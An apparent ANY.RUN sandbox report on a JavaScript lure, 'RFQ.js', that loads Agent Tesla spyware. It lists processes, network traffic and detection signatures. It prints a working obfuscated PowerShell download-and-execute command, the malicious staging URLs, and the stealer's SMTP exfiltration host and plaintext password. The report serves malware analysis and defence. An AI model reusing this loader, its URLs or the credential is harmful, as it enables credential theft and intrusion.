File name: RFQ.js

Full analysis: https://app.any.run/tasks/832c8cc4-f2e0-4e04-ba2e-719647921c9f
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold.

Analysis date: April 15, 2025, 18:58:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stegocampaign
payload
ta558
apt
evasion
stealer
agenttesla
loader
reverseloader
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (464), with CRLF line terminators
MD5: 433A9653BFF6B1327BEEC575941043C7
SHA1: 5CF586D44651FCCED47742C14BDC6A70E2403CD6
SHA256: 36C8CFD24C980C7B834B71C224C2B393A58303C8F8500046914F53694D0BC37A
SSDEEP: 48:5iaxLz5cuDfxLV+V+M+zzMtXV+RyRRzYE6z6hyURt6N6yn:gaxLdcgBV+V+M+zzMtXV+RyRRzYE6z6q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 2384)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 2384)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 2384)
    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 5864)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 4688)
    • Actions look like stealing of personal data

      • MSBuild.exe (PID: 4688)
    • AGENTTESLA has been detected (YARA)

      • MSBuild.exe (PID: 4688)
    • REVERSELOADER has been detected (SURICATA)

      • powershell.exe (PID: 5864)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 5864)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2384)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2384)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 2384)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 2384)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 2384)
    • Potential Corporate Privacy Violation

      • wscript.exe (PID: 2384)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Contacting a server suspected of hosting an Exploit Kit

      • powershell.exe (PID: 5864)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 4688)
    • Connects to SMTP port

      • MSBuild.exe (PID: 4688)
  • INFO

    • Checks proxy server information

      • wscript.exe (PID: 2384)
      • powershell.exe (PID: 5864)
      • MSBuild.exe (PID: 4688)
      • slui.exe (PID: 6960)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Disables trace logs

      • powershell.exe (PID: 5864)
      • MSBuild.exe (PID: 4688)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Reads the computer name

      • MSBuild.exe (PID: 4688)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 4688)
    • Reads the software policy settings

      • MSBuild.exe (PID: 4688)
      • slui.exe (PID: 6960)
    • Checks supported languages

      • MSBuild.exe (PID: 4688)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process: (4688) MSBuild.exe
Protocol: smtp
Host: mail.ctdi.com.ph
Port: 587
Password: A#f+Y]H8iO4a
All screenshots are available in the full report
Total processes
131
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

start wscript.exe #STEGOCAMPAIGN powershell.exe conhost.exe no specs #AGENTTESLA msbuild.exe svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1184
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2384
CMD: "C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\RFQ.js
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4688
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
5864"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JSeattleBySeattleG8SeattledQBnSeattleGgSeattlebgBlSeattleGMSeattleawSeattlegSeattleD0SeattleISeattleSeattlenSeattleCMSeattleeSeattleSeattlejSeattleC4SeattleYQBtSeattleG0SeattleLwBySeattleGISeattleLgSeattlejSeattleGUSeattlebgSeattleuSeattleG0SeattlebwBjSeattleGUSeattlebSeattleBlSeattleCMSeattleIwBlSeattleG4SeattleawBuSeattleGkSeattlebSeattleSeattlevSeattleC8SeattleOgBwSeattleCMSeattleIwBoSeattleCcSeattleOwSeattlekSeattleEgSeattleZQBySeattleG0SeattleZQBzSeattleCSeattleSeattlePQSeattlegSeattleCQSeattlecgBvSeattleHUSeattleZwBoSeattleG4SeattleZQBjSeattleGsSeattleISeattleSeattletSeattleHISeattleZQBwSeattleGwSeattleYQBjSeattleGUSeattleISeattleSeattlenSeattleCMSeattleJwSeattlesSeattleCSeattleSeattleJwB0SeattleCcSeattleOwSeattlekSeattleHISeattleYQBtSeattleG0SeattleZQBkSeattleCSeattleSeattlePQSeattlegSeattleCcSeattleaSeattleB0SeattleHQSeattlecSeattleBzSeattleDoSeattleLwSeattlevSeattleGESeattlecgBjSeattleGgSeattleaQB2SeattleGUSeattleLgBvSeattleHISeattleZwSeattlevSeattleGQSeattlebwB3SeattleG4SeattlebSeattleBvSeattleGESeattleZSeattleSeattlevSeattleG4SeattleZQB3SeattleF8SeattleaQBtSeattleGESeattleZwBlSeattleF8SeattleMgSeattlewSeattleDISeattleNQSeattlewSeattleDQSeattleMQSeattlezSeattleC8SeattlebgBlSeattleHcSeattleXwBpSeattleG0SeattleYQBnSeattleGUSeattleLgBqSeattleHSeattleSeattleZwSeattlenSeattleDsSeattleJSeattleBhSeattleGMSeattleZQB0SeattleG8SeattlebgBpSeattleGQSeattleZQBzSeattleCSeattleSeattlePQSeattlegSeattleE4SeattleZQB3SeattleC0SeattleTwBiSeattleGoSeattleZQBjSeattleHQSeattleISeattleBTSeattleHkSeattlecwB0SeattleGUSeattlebQSeattleuSeattleE4SeattleZQB0SeattleC4SeattleVwBlSeattleGISeattleQwBsSeattleGkSeattleZQBuSeattleHQSeattleOwSeattlekSeattleGESeattleYwBlSeattleHQSeattlebwBuSeattleGkSeattleZSeattleBlSeattleHMSeattleLgBISeattleGUSeattleYQBkSeattleGUSeattlecgBzSeattleC4SeattleQQBkSeattleGQSeattleKSeattleSeattlenSeattleFUSeattlecwBlSeattleHISeattleLQBBSeattleGcSeattleZQBuSeattleHQSeattl
eJwSeattlesSeattleCcSeattleTQBvSeattleHoSeattleaQBsSeattleGwSeattleYQSeattlevSeattleDUSeattleLgSeattlewSeattleCcSeattleKQSeattle7SeattleCQSeattlecwBoSeattleG8SeattlecSeattleBtSeattleGESeattleaQBkSeattleCSeattleSeattlePQSeattlegSeattleCQSeattleYQBjSeattleGUSeattledSeattleBvSeattleG4SeattleaQBkSeattleGUSeattlecwSeattleuSeattleEQSeattlebwB3SeattleG4SeattlebSeattleBvSeattleGESeattleZSeattleBESeattleGESeattledSeattleBhSeattleCgSeattleJSeattleBySeattleGESeattlebQBtSeattleGUSeattleZSeattleSeattlepSeattleDsSeattleJSeattleBuSeattleG8SeattlebgBnSeattleGESeattlebQBlSeattleHISeattlecwSeattlegSeattleD0SeattleISeattleBbSeattleFMSeattleeQBzSeattleHQSeattleZQBtSeattleC4SeattleVSeattleBlSeattleHgSeattledSeattleSeattleuSeattleEUSeattlebgBjSeattleG8SeattleZSeattleBpSeattleG4SeattleZwBdSeattleDoSeattleOgBVSeattleFQSeattleRgSeattle4SeattleC4SeattleRwBlSeattleHQSeattleUwB0SeattleHISeattleaQBuSeattleGcSeattleKSeattleSeattlekSeattleHMSeattleaSeattleBvSeattleHSeattleSeattlebQBhSeattleGkSeattleZSeattleSeattlepSeattleDsSeattleJSeattleBuSeattleG8SeattlebgBmSeattleGUSeattleYQBzSeattleGESeattlebgBjSeattleGUSeattlecwSeattlegSeattleD0SeattleISeattleSeattlenSeattleDwSeattlePSeattleBCSeattleEESeattleUwBFSeattleDYSeattleNSeattleBfSeattleFMSeattleVSeattleBBSeattleFISeattleVSeattleSeattle+SeattleD4SeattleJwSeattle7SeattleCQSeattleaQBuSeattleGMSeattleZQBzSeattleHQSeattledQBvSeattleHUSeattlecwSeattlegSeattleD0SeattleISeattleSeattlenSeattleDwSeattlePSeattleBCSeattleEESeattleUwBFSeattleDYSeattleNSeattleBfSeattleEUSeattleTgBESeattleD4SeattlePgSeattlenSeattleDsSeattleJSeattleBoSeattleHUSeattlebSeattleBzSeattleGUSeattleYQBuSeattleCSeattleSeattlePQSeattlegSeattleCQSeattlebgBvSeattleG4SeattleZwBhSeattleG0SeattleZQBySeattleHMSeattleLgBJSeattleG4SeattleZSeattleBlSeattleHgSeattleTwBmSeattleCgSeattleJSeattleBuSeattleG8SeattlebgBmSeattleGUSeattleYQBzSeattleGESeattlebgBjSeattleGUSeattlecwSeattlepSeattleDsSeattleJSeattleBjSeattleG8SeattlebgBmSeattleGkSeattlebgBlSeattleGQSeattlebSeattleB5SeattleCSeattleSeattlePQSeattle
gSeattleCQSeattlebgBvSeattleG4SeattleZwBhSeattleG0SeattleZQBySeattleHMSeattleLgBJSeattleG4SeattleZSeattleBlSeattleHgSeattleTwBmSeattleCgSeattleJSeattleBpSeattleG4SeattleYwBlSeattleHMSeattledSeattleB1SeattleG8SeattledQBzSeattleCkSeattleOwSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleISeattleSeattletSeattleGcSeattleZQSeattlegSeattleDSeattleSeattleISeattleSeattletSeattleGESeattlebgBkSeattleCSeattleSeattleJSeattleBjSeattleG8SeattlebgBmSeattleGkSeattlebgBlSeattleGQSeattlebSeattleB5SeattleCSeattleSeattleLQBnSeattleHQSeattleISeattleSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleOwSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleISeattleSeattlerSeattleD0SeattleISeattleSeattlekSeattleG4SeattlebwBuSeattleGYSeattleZQBhSeattleHMSeattleYQBuSeattleGMSeattleZQBzSeattleC4SeattleTSeattleBlSeattleG4SeattleZwB0SeattleGgSeattleOwSeattlekSeattleG4SeattlebwBuSeattleGwSeattleaQBiSeattleGUSeattlecgBhSeattleGwSeattleISeattleSeattle9SeattleCSeattleSeattleJSeattleBjSeattleG8SeattlebgBmSeattleGkSeattlebgBlSeattleGQSeattlebSeattleB5SeattleCSeattleSeattleLQSeattlegSeattleCQSeattleaSeattleB1SeattleGwSeattlecwBlSeattleGESeattlebgSeattle7SeattleCQSeattleaSeattleBvSeattleHISeattlecwBlSeattleHISeattleYQBkSeattleGkSeattlecwBoSeattleGUSeattlecwSeattlegSeattleD0SeattleISeattleSeattlekSeattleG4SeattlebwBuSeattleGcSeattleYQBtSeattleGUSeattlecgBzSeattleC4SeattleUwB1SeattleGISeattlecwB0SeattleHISeattleaQBuSeattleGcSeattleKSeattleSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleLSeattleSeattlegSeattleCQSeattlebgBvSeattleG4SeattlebSeattleBpSeattleGISeattleZQBySeattleGESeattlebSeattleSeattlepSeattleDsSeattleJSeattleBLSeattleGUSeattleZgBhSeattleGwSeattlebwB2SeattleHISeattleaQBzSeattleHMSeattleaQSeattlegSeattleD0SeattleISeattleBbSeattleFMSeattleeQBzSeattleHQSeattleZQBtSeattleC4SeattleQwBvSeattleG4SeattledgBlSeattleHISeattledSeattleBdSeattleDoSeattleOgBGSeattleHISeattlebwBtSeattleEISeattleYQBzSeattleGUSeattleNgSeattle0SeattleFMSeattledSeattleBySeatt
leGkSeattlebgBnSeattleCgSeattleJSeattleBoSeattleG8SeattlecgBzSeattleGUSeattlecgBhSeattleGQSeattleaQBzSeattleGgSeattleZQBzSeattleCkSeattleOwSeattlekSeattleHMSeattleeQBjSeattleG8SeattlecSeattleBoSeattleGESeattlebgB0SeattleGkSeattlecwBtSeattleCSeattleSeattlePQSeattlegSeattleFsSeattleUwB5SeattleHMSeattledSeattleBlSeattleG0SeattleLgBSSeattleGUSeattleZgBsSeattleGUSeattleYwB0SeattleGkSeattlebwBuSeattleC4SeattleQQBzSeattleHMSeattleZQBtSeattleGISeattlebSeattleB5SeattleF0SeattleOgSeattle6SeattleEwSeattlebwBhSeattleGQSeattleKSeattleSeattlekSeattleEsSeattleZQBmSeattleGESeattlebSeattleBvSeattleHYSeattlecgBpSeattleHMSeattlecwBpSeattleCkSeattleOwSeattlekSeattleHMSeattlecSeattleB1SeattleGcSeattleZwBpSeattleGUSeattleISeattleSeattle9SeattleCSeattleSeattleWwBkSeattleG4SeattlebSeattleBpSeattleGISeattleLgBJSeattleE8SeattleLgBISeattleG8SeattlebQBlSeattleF0SeattleLgBHSeattleGUSeattledSeattleBNSeattleGUSeattledSeattleBoSeattleG8SeattleZSeattleSeattleoSeattleCcSeattleVgBBSeattleEkSeattleJwSeattlepSeattleC4SeattleSQBuSeattleHYSeattlebwBrSeattleGUSeattleKSeattleSeattlekSeattleG4SeattledQBsSeattleGwSeattleLSeattleSeattlegSeattleFsSeattlebwBiSeattleGoSeattleZQBjSeattleHQSeattleWwBdSeattleF0SeattleISeattleBSeattleSeattleCgSeattleJSeattleBISeattleGUSeattlecgBtSeattleGUSeattlecwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleTQBTSeattleEISeattledQBpSeattleGwSeattleZSeattleSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwBDSeattleDoSeattleXSeattleBVSeattleHMSeattleZQBySeattleHMSeattleXSeattleBQSeattleHUSeattleYgBsSeattleGkSeattleYwBcSeattleEQSeattlebwB3SeattleG4SeattlebSeattleBvSeattleGESeattleZSeattleBzSeattleCcSeattleLSeattleSeattlenSeattleEQSeattleZQBzSeattleG4SeattleYQSeattlenSeattleCwSeattleJwBqSeattleHMSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattlecwB0SeattleGESeattlebSeattleBhSeattleGMSeattledSeattleBpSeattleHQSeattleaQB
jSeattleGESeattlebSeattleSeattlenSeattleCwSeattleJwSeattleySeattleCcSeattleLSeattleSeattlenSeattleCcSeattleKQSeattlepSeattleSeattle=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('Seattle','A'))); Invoke-Expression $OWjuxd""
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6960
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
13 414
Read events
13 399
Write events
15
Delete events
0

Modification events

(PID) Process: (2384) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: 6CD6100000000000

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation: write
Name: FileDirectory
Value: %windir%\tracing

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (4688) MSBuild.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
Operation: write
Name: EnableAutoFileTracing
Value: 0
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 5864
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zg5jczkn.bug.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5864
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o1bgx2dn.akh.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5864
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 3277A59A4850D6172976DDA14BAFB486
SHA256: 91E25FCE2D921F5D4CCF5BC2219C5BAFB344372007494C56D794E1B5E4334D9F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
37
TCP/UDP connections
55
DNS requests
20
Threats
13

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
2384 | wscript.exe | GET | 301 | 23.186.113.60:80 | http://paste.ee/d/FunHe8Xc | unknown | shared
2104 | svchost.exe | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
 | | GET | 302 | 207.241.224.2:443 | https://archive.org/download/new_image_20250413/new_image.jpg | unknown | 
5864 | powershell.exe | GET | 200 | 162.241.2.198:80 | http://linknettelecom.net.br/mma.txt | unknown | 
4688 | MSBuild.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | whitelisted
5436 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
5436 | SIHClient.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | whitelisted
5436 | SIHClient.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | whitelisted
5436 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
5436 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
300 | RUXIMICS.exe | 51.104.136.2:443 | | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
 | | 51.104.136.2:443 | | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2104 | svchost.exe | 51.104.136.2:443 | | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
 | | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
2384 | wscript.exe | 23.186.113.60:80 | paste.ee | | | shared
2384 | wscript.exe | 23.186.113.60:443 | paste.ee | | | shared
2104 | svchost.exe | 104.124.11.17:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
6544 | svchost.exe | 20.190.160.64:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.74.206
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
paste.ee
  • 23.186.113.60
shared
crl.microsoft.com
  • 104.124.11.17
  • 104.124.11.58
  • 2.18.121.139
  • 2.18.121.147
whitelisted
login.live.com
  • 20.190.160.64
  • 20.190.160.17
  • 20.190.160.131
  • 40.126.32.134
  • 40.126.32.76
  • 20.190.160.128
  • 20.190.160.65
  • 20.190.160.20
whitelisted
archive.org
  • 207.241.224.2
whitelisted
ia601700.us.archive.org
  • 207.241.227.90
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
linknettelecom.net.br
  • 162.241.2.198
unknown
ip-api.com
  • 208.95.112.1
whitelisted

Threats

Class | Message
Misc activity | ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
Potential Corporate Privacy Violation | ET INFO Pastebin-style Service (paste .ee) in TLS SNI
Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
A Network Trojan was detected | PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
Exploit Kit Activity Detected | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com)
Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
Device Retrieving External IP Address Detected | ET INFO External IP Lookup ip-api.com